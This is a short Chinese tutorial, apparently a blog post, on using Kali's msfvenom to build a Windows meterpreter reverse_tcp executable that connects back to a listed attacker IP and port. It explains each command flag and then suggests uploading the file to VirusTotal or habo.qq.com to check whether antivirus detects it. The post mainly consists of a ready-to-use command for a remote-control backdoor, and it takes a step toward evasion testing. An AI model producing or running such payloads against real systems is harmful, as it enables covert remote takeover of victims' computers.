kali-复现对被控端控制

一、 生成被控制端可执行文件:

•Msfvenom

•用到参数-p、-f 、-o

•-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe

•-p, –payload Payload to use;指定哪些有效载荷生成

•本例中  windows/meterpreter/reverse_tcp   :用于Windows平台的反向远程控制程序

•-f, –format Output format;指定有效载荷的格式

•本例中  exe   生成Windows系统的可执行文件

•-o, –out Save the payload;指定保存位置

•本例中 /root/payload.exe ,即为生成的文件放在root文件夹里,文件名称为payload

•LHOST 是指定逆向连接的IP地址,这里是kali的IP地址

•LPORT是指定逆向连接的端口

在终端输入以下代码

-p windows/meterpreter/reverse_tcp LHOST=IP  LPORT=端口 -f exe –o /root/payload.exe

     生成被控端可执行文件

注意:如果双击打不开root文件夹,选择以管理员模式打开

二、在网站中检测生成的可执行文件:

检测网站: 

www.virustotal.com  或者  habo.qq.com


使用kali里的浏览器打开网站,将生成的可执行文件拖入进行检测:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值